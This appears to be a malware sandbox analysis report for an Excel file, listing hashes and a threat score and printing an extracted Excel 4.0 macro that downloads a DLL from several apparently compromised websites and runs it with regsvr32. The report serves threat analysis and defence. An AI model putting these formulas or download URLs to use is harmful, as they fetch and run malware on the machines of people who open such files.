General

  • Target

    56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

  • Size

    29KB

  • Sample

    240909-1wcweasdmq

  • MD5

    c21157422bc9b05232891a332c35a2fd

  • SHA1

    791f2d9c8178c44de752136047bd9a33b040daad

  • SHA256

    56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

  • SHA512

    72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62

  • SSDEEP

    384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0)
    =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0))
    =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0))
    =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0))
    =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0))
    =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0))
    =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0))
    =IF('LFEVE'!F23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll")
    =RETURN()

Targets

    • Target

      56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a

    Score
    3/10
